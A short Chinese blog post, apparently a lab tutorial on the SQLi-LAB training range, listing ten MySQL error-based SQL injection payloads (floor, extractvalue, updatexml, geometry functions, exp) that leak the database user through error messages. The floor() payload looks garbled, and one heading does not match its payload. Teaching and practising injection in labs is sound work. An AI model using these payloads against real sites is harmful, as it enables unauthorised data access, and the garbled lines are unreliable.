SQL注入-报错函数总结

2020-03-29  本文已影响0人  gg大宇

靶场使用SQLi-LAB Lesson1:


image.png

网上看了一些文章,大多数报错函数都是floor() extractvalue() updatexml() exp(),但是在mysql中还有很多其他的报错函数

1、floor()

payload:id=-1'+and+(select 1 from (select count(),concat(user(),floor(rand()2))x from information_schema.tables group by x limit 0,1)a)%23

image.png
2、extractvalue()

使用sqli-lab第二关
payload:id=1+and+(extractvalue(1,concat(0x5c,(select user()))))%23


image.png
3、updatexml

payload:id=1+and+(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))%23


image.png
4、GeometryCollection()

payload:id=1+and+GeometryCollection((select * from(select *from(select user())a)b))%23


image.png
5、polygon()

payload:id=1+and+polygon((select * from(select * from(select user())a)b))%23


image.png
6、multipoint()

payload:id=1+and+multipoint((select * from(select * from (select user())a)b))%23


image.png
7、multilinestring()

payload:id=1+and+multilinestring((select * from(select * from (select user())a)b))%23


image.png
8、linestring()

payload:id=1+and+multipolygon((select * from (select * from (select user())a)b))%23


image.png
9、linestring()

payload:id=1+and+linestring((select * from (select * from (select user())a)b))%23


image.png
10、exp()

payload:id=1+and+exp(~(select * from (select user())a))%23


image.png
上一篇下一篇

猜你喜欢

热点阅读